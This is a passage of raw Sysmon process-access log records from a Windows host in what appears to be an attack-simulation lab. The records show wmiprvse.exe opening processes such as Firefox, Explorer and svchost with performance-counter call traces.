l+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150534Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150533Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150532Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150531Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150530Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150529Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150528Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150527Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150526Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150525Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150524Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150523Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150522Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150521Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150520Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150519Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|